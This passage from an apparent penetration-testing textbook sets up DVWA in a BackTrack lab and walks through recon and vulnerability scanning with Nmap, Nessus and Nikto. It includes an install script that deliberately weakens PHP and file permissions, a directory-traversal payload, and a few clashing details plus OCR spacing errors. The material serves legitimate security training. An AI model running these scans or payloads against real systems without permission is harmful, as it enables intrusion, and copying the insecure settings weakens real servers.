will be sticking to BackTrack throughout the book. BackTrack includes hundreds of
professional-grade tools for hacking, doing reconnaissance, digital forensics, fuzzing,
bug hunting, exploitation, and many other hacking techniques. The necessary tools and
commands in BackTrack applicable to our approach will be covered in great detail as they
are introduced.

Target Web Application

D amn Vulnerable Web A pplication (D VWA) will be used for the target web application
and can be researched further at its homepage at http://www.dvwa.co.uk/. D VWA is a
PHP/MyS Q L web application that is vulnerable by design to aid security professionals as
they test their skills and tools in a safe and legal environment. I t’s also used to help web
developers better understand the processes of securing web applications.
However, D VWA is not natively available as a VM, so you would have to create your
own VM and then set up and conﬁgure D VWA to run inside this new VM. I f tha
interests you, installation instructions and the ﬁles necessary to download are available
on the DVWA web site.
For our purposes, we will be accessing D VWA by having it run locally in the BackTrack
VM via http://localhost or the 127.0.0.1 I P address. We will be hosting both our target
application (D VWA) and the hacking tools in our BackTrack VM. This means you wil
have everything you need in one VM and will use less system resources.

Installing The Target Web Application

I n order to set up our safe hacking environment, we ﬁrst need to download a BackTrack
VM and conﬁgure it to host the D VWA target web application. The following steps ready
the BackTrack VM for installation of the DVWA.
1. Download a BackTrack virtual machine from http://www.backtracklinux.org/downloads/.
2. Extract the. 7z file of the BackTrack virtual machine.
3. Launch the BackTrack VM by double-clicking the .vmx file in the BackTrack folder.
If prompted, select I copied it and select OK.
4. Login to BackTrack with the root user and toor password.
5. Use the startx command to start the graphical user interface (GUI) of BackTrack.
6. Open a terminal by clicking on the Terminal icon in the upper left-hand corner of
the screen. It’s the one that looks like a computer screen with > _ on it as shown in
Figure 1.1. This is where we will be entering commands (instructions) for a myriad
of BackTrack tools!

FIGURE 1.1 Opening a terminal in BackTrack.

O nce you have successfully logged into BackTrack, complete the following steps to
install D VWA as the target application. This will require a live I nternet connection, so
ensure that your host machine can browse the I nternet by opening a Firefox browser to
test connectivity.

A le rt
For trouble-shooting your VM’s ability to make use of the host machine’s
I nternet connection, check the network adapter se ings for your VM in VM
Player if necessary. We are using the NAT network setting.

1. Browse to http://theunl33t.blogspot.com/2011/08/script-to-download-configure-andlaunch.html in Firefox (by clicking on Applications and then Internet) in your
BackTrack VM to view the DVWA installation script created by the team at The
Unl33t. A link to this script is also included later in the chapter for your reference.
2. Select and copy the entire script starting with #/bin/bash and ending with last line
that ends with DVWA Install Finished!\n.
3. Open gedit Text Editor in BackTrack by clicking on Applications and then
Accessories.
4. Paste the script and save the file as DVWA_install.sh in the root directory as
shown in Figure 1.2.

FIGURE 1.2 Saving the DVWA install script in the root directory.

5. Close gedit and Firefox.
6. Open a terminal and run the ls command to verify the script is in the root directory.
7. Execute the install script by running the sh DVWA_install.sh command in a
terminal. The progress of the installation will be shown in the terminal and a
browser window to the DVWA login page will launch when successfully
completed.

Configuring The Target Web Application

O nce D VWA is successfully installed, complete the following steps to login and
customize the web application:
1. Login to DVWA with the admin username and password password as shown in
Figure 1.3.

FIGURE 1.3 Logging into DVWA as an application administrator.

A le rt
The URL is 127.0.0.1 (this islocalhost; the web server running directly in
BackTrack).

2. Click the options button in the lower right of Firefox if you are prompted about a
potentially malicious script. Remember DVWA is purposely vulnerable, so we
need to allow scripts to run.
3. Click Allow 127.0.0.1 so scripts are allowed to run on our local web server.
4. Click the Setup link in DVWA.
5. Click the Create / Setup Database button to create the initial database to be used
for our exercises as shown in Figure 1.4.

FIGURE 1.4 Confirmation that the initial database setup completed successfully.

6. Click the DVWA Security link in DVWA and choose low in the drop-down list as
shown in Figure 1.5.

FIGURE 1.5 Confirmation that the initial difficulty setup completed successfully.

7. Click the submit button to create these initial difficulty settings to be used for our
exercises. If the exercises are too easy for you, feel free to select a more advanced
difficulty level!
You are now ready to use hacking tools in BackTrack to a ack the D VWA web
application. You can revisit any of these steps to conﬁrm that your environment is set up
correctly. I t is not necessary to shut down the VM every time you want to take a break.
I nstead, you can suspend the VM, so the state of your work stays intact. I f you choose to
shut down the VM to conserve system resources (or for any other reason), you can easily
follow the steps above to prepare your VM. I t’s probably worth noting that you are now
running an intentionally vulnerable and exploitable web application on your BackTrack
machine. S o it’s probably not a good idea to use this machine while connected to the
Internet where others could attack you!

DVWA Install Script
#/bin/bash
echo -e "\n#######################################"
echo -e "# Damn Vulnerable Web App Installer Script #"
echo -e "#######################################"
echo " Coded By: Travis Phillips"
echo " Website: http://theunl33t.blogspot.com"
echo -e -n "\n[*] Changing directory to /var/www..."
cd /var/www > /dev/null
echo -e "Done!\n"
echo -n "[*] Removing default index.html..."
rm index.html > /dev/null
echo -e "Done!\n"
echo -n "[*] Changing to Temp Directory..."
cd /tmp
echo -e "Done!\n"
echo "[*] Downloading DVWA..."
wget http://dvwa.googlecode.com/files/DVWA-1.0.7.zip
echo -e "Done!\n"
echo -n "[*] Unzipping DVWA..."
unzip DVWA-1.0.7.zip > /dev/null
echo -e "Done!\n"
echo -n "[*] Deleting the zip file..."
rm DVWA-1.0.7.zip > /dev/null

echo -e "Done!\n"
echo -n "[*] Copying dvwa to root of Web Directory..."
cp -R dvwa/* /var/www > /dev/null
echo -e "Done!\n"
echo -n "[*] Clearing Temp Directory..."
rm -R dvwa > /dev/null
echo -e "Done!\n"
echo -n "[*] Enabling Remote include in php.ini..."
cp /etc/php5/apache2/php.ini /etc/php5/apache2/php.ini1
sed
-e
's/allow_url_include
=
Off/allow_url_include
=
On/'
/etc/php5/apache2/php.ini1 > /etc/php5/apache2/php.ini
rm /etc/php5/apache2/php.ini1 echo -e "Done!\n"
echo -n "[*] Enabling write permissions to /var/www/hackable/upload..."
chmod 777 /var/www/hackable/uploads/
echo -e "Done!\n"
echo -n "[*] Starting Web Service..."
service apache2 start &> /dev/null
echo -e "Done!\n"
echo -n "[*] Starting MySQL..."
service mysql start &> /dev/null
echo -e "Done!\n"
echo -n "[*] Updating Config File..."
cp /var/www/config/config.inc.php /var/www/config/config.inc.php1
sed
-e
's/'\'\''/'\''toor'\''/'
/var/www/config/config.inc.php1
>
/var/www/config/config.inc.php
rm /var/www/config/config.inc.php1
echo -e "Done!\n"
echo -n "[*] Updating Database..."
wget
--post-data
"create_db=Create
/
Reset
Database"
http://127.0.0.1/setup.php&> /dev/null
mysql
-u
root
--password='toor'
-e
'update
dvwa.users
set
avatar
=
"/hackable/users/gordonb.jpg" where user = "gordonb";'
mysql
-u
root
--password='toor'
-e
'update
dvwa.users
set
avatar
=
"/hackable/users/smithy.jpg" where user = "smithy";'
mysql
-u
root
--password='toor'
-e
'update
dvwa.users
set
avatar
=
"/hackable/users/admin.jpg" where user = "admin";'
mysql
-u
root
--password='toor'
-e
'update
dvwa.users
set
avatar
=
"/hackable/users/pablo.jpg" where user = "pablo";'
mysql
-u
root
--password='toor'
-e
'update
dvwa.users
set
avatar
=
"/hackable/users/1337.jpg" where user = "1337";'
echo -e "Done!\n"
echo -e -n "[*] Starting Firefox to DVWA\nUserName: admin\nPassword: password"
firefox http://127.0.0.1/login.php &> /dev/null &
echo -e "\nDone!\n"
echo -e "[\033[1;32m*\033[1;37m] DVWA Install Finished!\n"

C H AP T E R 2

Web Server Hacking

Chapter Rundown:
■ Recon made easy with host and robots.txt
■ Port scanning with Nmap: getting to know the world’s #1 port scanner
■ Vulnerability scanning with Nessus and Nikto: finding missing patches and more
■ Exploitation with Metasploit: a step-by-step guide to poppin’ boxes

Introduction

Web server hacking is a part of the larger universe known casually as “network hacking.”
For most people, this is the ﬁrst area of hacking that they dig into as it includes the most
well-known tools and has been widely publicized in the media. J ust check out the movies
that make use of some of the tools in this chapter!
O bviously, network hacking isn’t the emphasis of this book, but there are certain tools
and techniques that every security person should know about. These are introduced in
this chapter as we target the web server that is hosting the web application. N etwork
hacking makes use of some of the most popular hacking tools in the world today:
beauties such as N map, N esses, and Metasploit are tools in virtually every security
toolbox. I n order to position yourself to take on more advanced hacking techniques, you
must ﬁrst master the usage of these seminal tools. This is the classic “walk before you
run” scenario!
There are several tremendous books and resources dedicated to these tools, but things
take on a slightly diﬀerent format when we are speciﬁcally targeting the web server.
Traditional network hacking follows a very systematic methodology that this book is
based on. We will perform reconnaissance, port scanning, vulnerability scanning, and
exploitation while targeting the web server as the network service under attack.
We will perform some manual inspection of the robots.txt ﬁle on the web server to
be er understand what directories the owner does not want to be included in search
engine results. This is a potential roadmap to follow to sensitive information within the
web server—and we can do so from the comfort of our own web browser! We will also
use some speciﬁc tools dedicated to web server hacking such as N ikto for web server
vulnerability scanning. Couple all of this with the mature tools and techniques of
traditional network hacking, and we have a great approach for hacking the web server.
Let’s dig in!

Reconnaissance
D uring the Reconnaissance stage (also known as recon or information gathering), you
gather as much information about the target as possible such as its I P address; the
network topology; devices on the network; technologies in use; package versions; and
more. While many tools may be involved in recon, we’ll focus ﬁrst on using host and
Netcraft to retrieve the server’s I P address (unique numeric address) and to inspect its
robots.txt file for additional information about the target environment.
Recon is widely considered as the most important aspect of a network-based a ack.

A lthough recon can be very time-consuming, it forms the basis of almost every
successful network a ack, so take your time. Be sure when gathering information that
you record everything. A s you run your tools, save the raw output and you’ll end up with
an impressive collection of URLs, I P addresses, email addresses, and other noteworthy
tidbits. I f you’re conducting a professional penetration test, it’s always a good idea to
save this raw output as often times you will need to include it in the ﬁnal report to your
client.

Learning About The Web Server

We are targeting the web server because it is designed to be reachable from outside the
network. I ts main purpose is to host web applications that can be accessed by users
beyond the internal network. A s such, it becomes our window into the network. First, we
need to ﬁnd the web server’s external I P address so that we can probe it. We’ll generally
start with the URL of the target web application, such ashttp://syngress.com, which we’ll
then convert to an I P address. A URL is usually in text format that is easily remembered
by a user, while an I P address is a unique numeric address of the web server. N etwork
hacking tools generally use the I P address of the web server, although you can also use
the host name and your computer will perform the lookup automatically in the
background. To convert the URL to an I P address, use thehost command in a BackTrack
terminal.
host syngress.com

This command returns the following results, which includes the external I P address of
the D akota S tate University (dsu.edu) domain as the ﬁrst entry. The other entry relates to
email services and should be archived for potential use later on.
dsu.edu has address 138.247.64.140
dsu.edu mail is handled by 10 dsu-mm01.dsu.edu.

You can also retrieve the I P address by searching by URL athttp://news.netcraft.com/.
A web browser is capable of processing both I P addresses and URLs to retrieve the home
page of a web application hosted on a web server. S o to make sure that you have found
the correct I P address of the web server, enter the I P address directly into a browser to
see if you reach the target as shown in Figure 2.1.

A le rt
S imply requesting the I P address in the URL address bar isn’t applicable in a
shared server environment, which is quite widespread today. This means that
several web sites are hosted on one I P address in a virtual environment to
conserve web server space and resources. A s an alternative, you can use an
online service such as http://sharingmyip.com/ to ﬁnd all the domains that
share a speciﬁed I P address to make sure that web server is hosting your
intended target before continuing on. Many shared hosting environments
require signed agreements before any security testing is allowed to be

conducted against the environment.

FIGURE 2.1 Using an IP address to reach the target.

The Robots.Txt File
O ne way to begin understanding what’s running on a web server is to view the server’s
robots.txt file. The robots.txt ﬁle is a listing of the directories and ﬁles on a web server that
the owner wants web crawlers to omit from the indexing process. A web crawler is a
piece of software that is used to catalog web information to be used in search engines
and archives that are mostly commonly deployed by search engines such as Google and
Yahoo. These web crawlers scour the I nternet and index (archive) all possible ﬁndings to
improve the accuracy and speed of their Internet search functionality.
To a hacker, the robots.txt ﬁle is a road map to identify sensitive information because
any web server’s robots.txt ﬁle can be retrieved in a browser by simply requesting it in the
URL. Here is an examplerobots.txt ﬁle that you can easily retrieve directly in your
browser by simply requesting /robots.txt after a host URL.
User-agent: *
# Directories
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /themes/
# Files
Disallow: /CHANGELOG.txt
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt
Disallow: /INSTALL.pgsql.txt
Disallow: /install.php
Disallow: /INSTALL.txt
Disallow: /LICENSE.txt
Disallow: /MAINTAINERS.txt
Disallow: /update.php
Disallow: /UPGRADE.txt
Disallow: /xmlrpc.php
# Paths (clean URLs)
Disallow: /admin/

Disallow: /logout/
Disallow: /node/add/
Disallow: /search/
Disallow: /user/register/
Disallow: /user/password/
Disallow: /user/login/
# Paths (no clean URLs)
Disallow: /?q=admin/
Disallow: /?q=logout/
Disallow: /?q=node/add/
Disallow: /?q=search/
Disallow: /?q=user/password/
Disallow: /?q=user/register/
Disallow: /?q=user/login/

This robots.txt file is broken out into four different sections:
1. Directories
2. Files
3. Paths (clean URLs)
4. Paths (no clean URLs)
Clean URLs are absolute URL paths that you could copy and paste into your browser
Paths with no clean URLs are using a parameter,q in this example, to drive the
functionality of the page. You may have heard this referred to as a builder page, where
one page is used to retrieve data based solely on the URL parameter(s) that were passed
in. Directories and files are straightforward and self-explanatory.
Every web server must have a robots.txt ﬁle in its root directory otherwise web crawlers
may actually index the entire site, including databases, ﬁles, and all! Those are items no
web server administrator wants as part of your next Google search. The root directory of
a web server is the actual physical directory on the host computer where the web server
software is installed. In Windows, the root directory is usually C:/inetpub/wwwroot/, and in
Linux it’s usually a close variant of /var/www/.
There is nothing stopping you from creating a web crawler of your own that provides
the complete opposite functionality. S uch a tool would, if you so desired, only request
and retrieve items that appear in the robots.txt and would save you substantial time if you
are performing recon on multiple web servers. O therwise, you can manually request and
review each robots.txt ﬁle in the browser. The robots.txt ﬁle is complete roadblock for
automated web crawlers, but not even a speed bump for human hackers who want to
review this sensitive information.

Port Scanning
Port scanning is simply the process of identifying what ports are open on a target
computer. I n addition, ﬁnding out what services are running on these ports in a common
outcome of this step. Ports on a computer are like any opening that allows entry into a
house, whether that’s the front door, side door, or garage door. Continuing the house
analogy, services are the traﬃc that uses an expected entry point into the house. For
example, salesmen use the front door, owners use the garage door, and friends use the

side door. J ust as we expect salesmen to use the front door, we also expect certain
services to use certain ports on a computer. I t’s pre y standard for HTTP traﬃc to use
port 80 and HTTPS traﬃc to use port 443. S o, if we ﬁnd ports 80 and 443 open, we can be
somewhat sure that HTTP and HTTPS are running and the machine is probably a web
server. O ur goal when port scanning is to answer three questions regarding the web
server:
1. What ports are open?
2. What services are running on these ports?
3. What versions of those services are running?
I f we can get accurate answers to these questions, we will have strengthened our
foundation for attack.

Nmap

The most widely used port scanner is Nmap, which is available in BackTrack and has
substantial documentation at http://nmap.org. First released by Gordon “Fyodor” Lyon in
1997, Nmap continues to gain momentum as the world’s best port scanner with added
functionality in vulnerability scanning and exploitation. The most recent major release of
Nmap at the time of this writing is version 6, and it includes a ton of functionality
dedicated to scanning web servers.

Updating Nmap
Before you start using with Nmap, be sure that you’re running the most recent version by
running the nmap -V command in a terminal. I f you are not running version 6 or higher,
you need to update Nmap. To perform the updating process, open a terminal in
BackTrack and run the apt-get upgrade nmap command. To make sure you are running
version 6 or higher, you can again use the nmap -V command after installation is
complete.

Running Nmap
There are several scan types in Nmap and switches that add even more functionality. We
already know the IP address of our web server so many of the scans in Nmap dedicated to
host discovery (ﬁnding an I P address of a server) can be omi ed as we are more
interested in harvesting usable information about the ports, services, and versions
running on the web server. We can run Nmap on our D VWA web server when it’s
running on the localhost (127.0.0.1). From a terminal, run the following Nmap command.
nmap -sV -O -p- 127.0.0.1

Let’s inspect each of the parts of the command you just ran, so we all understand what
the scan is trying to accomplish.
■ The –sV designates this scan as a versioning scan that will retrieve specific versions of
the discovered running services.
■ The –O means information regarding the operating system will be retrieved such as
the type and version.

■ The -p- means we will scan all ports.
■ The 127.0.0.1 is the IP address of our target.
O ne of Nmap’s most useful switches is ﬁngerprinting the remote operating system to
retrieve what services and versions are on the target. Nmap sends a series of packets to
the remote host and compares the responses to its nmap-os-db database of more than 2600
known operating system fingerprints. The results of our first scan are shown below.
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000096s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.14 ((Ubuntu))
3306/tcp open mysql MySQL 5.1.41-3ubuntu12.10
7337/tcp open postgresql PostgreSQL DB 8.4.0
8080/tcp open http-proxy Burp Suite Pro http proxy
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:kernel:2.6 cpe:/o:linux:kernel:3
OS details: Linux 2.6.32 - 3.2
Network Distance: 0 hops
OS and Service detection performed. Please report any incorrect results at
http://nmap.org/submit/.
Nmap done: 1 IP address (1 host up) scanned in 9.03 seconds

You can see four columns of results: PORT, STATE, SERVICE, and VERSION. I n this
instance, we have four rows of results meaning we have four services running on this
web server. I t is pre y self-explanatory what is running on this machine (your results
may vary slightly depending on what you have running in your VM), but let’s discuss
each, so we are all on the same page with these Nmap results.
■ There is an Apache 2.2.14 web server running on port 80.
■ There is a 5.1.41 MySQL database running on port 3306.
■ There is a PostreSQL 8.4 database running on port 7175.
■ There is a web proxy (Burp Suite) running on port 8080.
Knowing the exact services and versions will be a great piece of information in the
upcoming vulnerability scanning and exploitation phases. There are also additional notes
about the kernel version, the operating system build details, and the number of network
hops (0 because we scanned our localhost).

A le rt
Running N map against localhost can be deceiving, as the ports that are
listening on the machine may not actually be available to another machine.
S ome of these machines may be on the same local area network (LA N ) or
completely outside of the LA N . 127.0.0.1 only pertains to the local machine
and is the loopback address that every machine uses to communicate to
itself. I n order to get a clear understanding of what is accessible by outsiders
to this machine, you would actually need to run this same Nmap scan from
two diﬀerent machines. You could run one from a machine inside the

network (your coworker’s machine) and one from a machine outside network
(your home machine). You would then have three scans to compare the
results of. I t’s not critical that you do this for our work, but it’s important to
realize that you may get diﬀerent results depending on what network you
scan from.

Nmap Scripting Engine (NSE)
O ne of the ways that Nmap has expanded its functionality is the inclusion of scripts to
conduct specialized scans. You simply have to invoke the script and provide any
necessary arguments in order to make use of the scripts. The N map Scripting Engine
(NSE) handles this functionality and fortunately for us has tons of web-speciﬁc scripts
ready to use. O ur D VWA web server is pre y boring, but it’s important to realize what is
capable when using NSE. There are nearly 400 Nmap scripts (396 to be exact at last
count), so you’re sure to ﬁnd a couple that are useful! You can see all current N S E scripts
and the accompanying documentation at http://nmap.org/nsedoc/. Here are a couple
applicable Nmap scripts that you can use on web servers.
You invoke all N S E scripts with--script=<script name > as part of the Nmap scan
syntax. This example uses the http-enum script to enumerate directories used by popular
web applications and servers as part of a version scan.
nmap -sV --script=http-enum 127.0.0.1

A sample output of this script ran against a Windows machine is shown below where
seven diﬀerent common directories have been found. These directories can be used in
later steps in our approach related to path traversal a acks. You can run this same N S E
script against D VWA and will see several directories listed and an instance of MyS Q L
running.
Interesting ports on 127.0.0.1:
PORT STATE SERVICE REASON
80/tcp open http syn-ack
| http-enum:
| | /icons/: Icons and images
| | /images/: Icons and images
| | /robots.txt: Robots file
| | /sw/auth/login.aspx: Citrix WebTop
| | /images/outlook.jpg: Outlook Web Access
| | /nfservlets/servlet/SPSRouterServlet/: netForensics
|_ |_ /nfservlets/servlet/SPSRouterServlet/: netForensics

A nother common web server scan that is very helpful is to check if the target machine
is vulnerable to anonymous M icrosoft FrontPage logins on port 80 by using the
http-frontpage-login script. O ne thought you may be having is, “I thought FrontPage was
only a Windows environment functionality.” O bviously, this is most applicable to
Windows environments that are running FrontPage, but when FrontPage extensions
were still widely used, there was support for this functionality on Linux systems as well.
FrontPage Extensions are no longer supported by Microsoft support, but they are still

widely used in older web servers.
nmap 127.0.0.1 -p 80 --script = http-frontpage-login

The sample output of the http-frontpage-login in shown below. O lder default
conﬁgurations of FrontPage extensions allow remote user to login anonymously, which
may lead to complete server compromise.
PORT STATE SERVICE REASON
80/tcp open http syn-ack
| http-frontpage-login:
| VULNERABLE:
| Frontpage extension anonymous login
| State: VULNERABLE
| Description:
| Default installations of older versions of frontpage
anonymous logins which can lead to server compromise.
|
| References:

extensions

allow

|_ http://insecure.org/sploits/Microsoft.frontpage.insecurities.html

The last example of NSE included here is to check if a web server is vulnerable to
directory traversal by a empting to retrieve the /etc/passwd ﬁle on a Linux web server or
boot.ini ﬁle on a Windows web server. This is a vulnerability that allows an a acker to
access resources in the web server’s ﬁle system that should not be accessible. This type
of a ack is covered in much more detail in a later chapter, but it’s tremendous
functionality is to have Nmap check for this vulnerability during the web server hacking
portion of our approach. This is another great example of discoveries made in one step,
which can be used later when attacking different targets.
nmap --script http-passwd --script-args http-passwd.root =/ 127.0.0.1

This is a great NSE script because it is diﬃcult for automated web application scanners
to check for directory traversal on the web server. S ample output illustrating this
vulnerability is introduced here.
80/tcp open http
| http-passwd: Directory traversal found.
| Payload: "index.html?../../../../../boot.ini"
| Printing first 250 bytes:
| [boot loader]
| timeout=30
| default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
| [operating systems]
|_multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft
Professional" /noexecute=optin /fastdetect

Windows

XP

T he Nmap ﬁndings from port scanning tie directly into the following sections when
Nessus and Nikto are used to scan for vulnerabilities in the web server.

Vulnerability Scanning
Vulnerability scanning is the process of detecting weaknesses in running services. O nce
you know the details of the target web server, such as the IP address, open ports, running
services, and versions of these services, you can then check these services for
vulnerabilities. This is the last step to be performed before exploiting the web server.

Vulnerability scanning is most commonly completed by using automated tools loaded
with a collection of exploit and fuzzing signatures, or plug-ins. These plug-ins probe the
target computer’s services to see how they will react to possible a ack. I f a service reacts
in a certain way, the vulnerability scanner is triggered and knows not only that the
service is vulnerable, but also the exact exploit that makes it vulnerable.
This is very similar to how antivirus works on your home computer. When a program
tries to execute on your computer, the antivirus product checks its collection of knownmalicious signatures and makes a determination if the program is a virus or not.
Vulnerability scanners and antivirus products are only as good as the signatures that
they are using to check with. I f the plug-ins of your vulnerability scanner are out-of-date,
the results will not be 100% accurate. I f the plug-ins ﬂag something as a false positive,
the results will not be 100% legitimate. I f the plug-ins miss an actual vulnerability, the
results will not be 100% legitimate. I’m sure you get the drift by now!
I t’s critical that you understand vulnerability scanning’s place in the total landscape of
hacking. Very advanced hackers don’t rely on a vulnerability scanner to ﬁnd exploitable
vulnerabilities; instead they perform manual analysis to ﬁnd vulnerabilities in software
packages and then write their own exploit code. This is outside the scope of this book,
but in order to climb the mountain of elite hacking, you will need to become comfortable
with fuzzing, debugging, reverse engineering, custom shell code, and manual
exploitation. These topics will be discussed in more detail in the ﬁnal chapter of this
book to give you guidance moving forward.

Nessus

We will be using Nessus, one of the most popular vulnerability scanners available, to
complete the vulnerability scanning step. However, hackers who use vulnerability
scanners will always be a step behind of the cu ing edge of security because you have to
wait for scanner vendors to write a plug-in that will detect any new vulnerability before it
gets patched. I t is very common to read about a new exploit and mere hours later have a
Nessus plug-in deployed to check for this new vulnerability. Be er yet, often times you
will read about the new vulnerability and the corresponding Nessus plug-in in the same
story! When you use the free HomeFeed edition of N essus, your plug-ins will be delayed
7 days, so your results will be slightly diﬀerent compared to the pay-for ProfessionalFeed
edition of the scanner for the most recent vulnerabilities.

Installing Nessus
The process to install Nessus is very straightforward and once it’s configured it will run as
a persistent service in BackTrack. You can download the installer for the free home
version of Nessus at http://www.nessus.org The ProfessionalFeed version ofNessus is
approximately $1,500 per year, but you can use the HomeFeed version to assess your own
personal servers. I f you are going to perform vulnerability scanning as part of your job or
anywhere outside your personal network, you need to purchase the ProfessionalFeed
activation code.

You must pick your activation code based on the operating system that the Nessus
service will be running on. For this book, you are using a 32-bit virtual machine of
BackTrack 5 that is based on Ubuntu (version 10.04 at the time of this writing). O nce
you’ve selected the correct operating system version, your activation code will be emailed
to you. Keep this email in a safe place, as you will need the activation code in the
upcoming Nessus conﬁguration steps. A quick rundown of the installation process for
Nessus is described in the following steps.
1. Save the Nessus installer (.deb file for BackTrack) in the root directory
2. Open a terminal and run the ls command and note the.deb file is in the root
directory
3. Run the dpkg –i Nessus-5.0.3-ubuntu910_i386.deb command to install Nessus

A le rt
dpkg is a package manager for Debian Linux to install and manage individual
packages. You may have downloaded a diﬀerent version of the N essus
installer, so please take note of the exact name of the N essus installer that
you downloaded. I f you’re unsure what version of N essus you need, you can
run the lsb:release -a command in a BackTrack terminal to retrieve the
operating system version details. You can then pick the appropriate N essus
installer to match and then use that.deb ﬁle in the dkpg command to install
Nessus.

Configuring Nessus
O nce you have installed Nessus, you must start the service before using the tool. You will
only have to issue the /etc/init.d/nessusd start command in a terminal once and then
Nessus will run as a persistent service on your system. O nce the service is running, the
following steps introduce how to configure Nessus.
1. In a browser, go to https://127.0.0.1:8834/ to start the Nessus configuration
procedure.
2. When prompted, create a Nessus administrator user. For this book, we will create
the root user with a password of toor.
3. Enter the activation code for the HomeFeed from your email.
4. Log in as the root user after the configuration completes.

A le rt
■ You must use https in the URL to access the Nessus server as it mandates a
secure connection.

■ The Nessus server is running on the localhost (127.0.0.1) and port 8834;
therefore, you must include the: 8834 as part of the URL.
■ The downloading of Nessus plug-ins and initial configuration will take 56 min depending on your hardware configuration. Have no fear; Nessus will
load much quicker during future uses!

Running Nessus
O nce you’ve logged into Nessus, the ﬁrst task is to specify what plug-ins will be used in
the scan. We will be performing a safe scan on our localhost, which includes all selected
plug-ins but will not a empt actual exploitation. This is a great approach for a proof-ofconcept scan and ensures that we will have less network outages due to active
exploitation. Follow these steps to set up the scan policy and the actual scan in Nessus.
1. Click Scans menu item to open the scans menu.
2. Click New Scan to define a new scan, enter localhost check for the name of the
scan, select Internal Network Scan for the Scan Policy, and enter 127.0.0.1 as the
scan target as shown in Figure 2.2.

FIGURE 2.2 Setting up “localhost check” scan in Nessus.

3. Click the Create Scan button in the lower left of the screen to fire the scan at the
target!
O nce the scan is kicked oﬀ, the Scans window will report the ongoing status as shown
in Figure 2.3.

FIGURE 2.3 Scan confirmation in Nessus.

The scan of 127.0.0.1 will be chock full of serious vulnerabilities because of BackTrack
being our operating system.

A le rt
This is a good time to remind you not to use BackTrack as your everyday
operating system. I t’s great at what it does (hacking!), but not a good choice
to perform online banking, checking your email, or connecting to unsecured
networks with. I would advise you to always have BackTrack available as a
virtual machine, but never rely on it as your base operating system.

Reviewing Nessus Results
O nce the scan status is completed, you can view the report by clicking on the Results
menu item, clicking the localhost check report to open it, and clicking on the purple
critical items as shown in Figure 2.4.

FIGURE 2.4 Report summary in Nessus.

The summary view of the report will be sorted by severity of the vulnerability with
Critical being the most severe. The others values of severity are High, Medium, Low, and
Informational. You can drill down into greater detail of any of the vulnerabilities by
double-clicking one of the report entries as shown in Figure 2.5.

FIGURE 2.5 Report details showing CVE in Nessus.

The Common Vulnerability and Exposures (CVE) identiﬁer is especially valuable
because these I D s are used to transition from Nessus’ vulnerability scanning to
Metasploit’s exploitation. CVE identiﬁers are made up of the year in which the
vulnerability was discovered and a unique identiﬁer. There are several other sources for
information regarding the CVEs found duringNessus scanning that you can review. The
oﬃcial CVE site is at https://cve.mitre.org/ and there are additional details available at
http://www.cvedetails.com/ where you can subscribe to RS S feeds customized to your
liking. A nother great resource is at http://packetstormsecurity.com/ where full
disclosures of all vulnerabilities are cataloged. I encourage you to use all these resources
as you work on web server hacking!

Nikto

Nikto is an open-source vulnerability scanner, wri en in Perl and originally released in
late 2001, that provides additional vulnerability scanning speciﬁc to web servers. I t
performs checks for 6400 potentially dangerous ﬁles and scripts, 1200 outdated server
versions, and nearly 300 version-specific problems on web servers.
There is even functionality to have Nikto launched automatically from Nessus when a
web server is found. We will be running Nikto directly from the command line in a
BackTrack terminal, but you can search the Nessus blog for the write-up on how these two
tools can work together in an automated way.
Nikto is built into BackTrack and is executed directly in the terminal. First, you need to
browse to the Nikto directory by executing the cd /pentest/web/nikto command in a
terminal window.
A lternatively, you can launch a terminal window directly in the N ikto directory from
the BackTrack menu by clicking A pplications → BackT rack → V ulnerability
A ssessment → Web A pplication A ssessment → Web V ulnerability Scanners → N iktoas
shown in Figure 2.6.

FIGURE 2.6 Opening Nikto from BackTrack menu.

You should always update Nikto by executing the perl nikto.pl -update command
before using the scanner to ensure that you have the most recent plug-in signatures. You
can run the scanner against our localhost with the following command where the -h
switch is used to deﬁne our target address (127.0.0.1) and the -p switch is used to specify
which ports we want to probe (1-500).
perl nikto.pl -h 127.0.0.1 -p 1–500

I t would have been just as simple to specify only port 80 for our scan as we already
know this is the only port that D VWA is using to communicate over HTTP. I n fact, if you
don’t specify ports for Nikto to scan, it will scan only port 80 by default. A s expected,
Nikto provides summary results from its scan of our DVWA web server.
+ Server: Apache/2.2.14 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.3.2-1ubuntu4.9
+ Root page / redirects to: login.php
+ robots.txt contains 1 entry which should be manually viewed.
+ Apache/2.2.14 appears to be outdated (current is at least Apache/2.2.19).
Apache 1.3.42 (final release) and 2.0.64 are also current.
+ ETag header found on server, inode: 829490, size: 26, mtime: 0x4c4799096fba4
+ OSVDB-3268: /config/: Directory indexing found.
+ /config/: Configuration information may be available remotely.
+ OSVDB-3268: /doc/: Directory indexing found.
+ OSVDB-48: /doc/: The /doc/ directory is browsable. This may be /usr/doc.
+
OSVDB-12184:
/index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000:
PHP
reveals potentially sensitive information via certain HTTP requests that contain
specific QUERY strings.
+ OSVDB-561: /server-status: This reveals Apache information. Comment out
appropriate line in httpd.conf or restrict access to allowed hosts.
+ OSVDB-3092: /login/: This might be interesting. . .
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /docs/: Directory indexing found.
+ OSVDB-3092: /CHANGELOG.txt: A changelog was found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 6456 items checked: 0 error(s) and 16 item(s) reported on remote host
+ End Time: 2012-07-11 09:27:23 (20 seconds)

The most important take-away from Nikto’s output is the O pen S ource Vulnerability
D atabase (O S VD B) entries that provide speciﬁc information about discovered
vulnerabilities. These identiﬁers are very similar to the CVE identiﬁers thatNessus and
Metasploit use. O S VD B is an independent and open-source project with the goal to
provide unbiased technical information on over 90,000 vulnerabilities related to over
70,000 products. I encourage you to visit http://osvdb.org for more information and to
retrieve technical details from your Nikto findings.

Exploitation
Exploitation is the moment when all the information gathering, port scanning, and
vulnerability scanning pays oﬀ and you gain unauthorized access to or execute remote
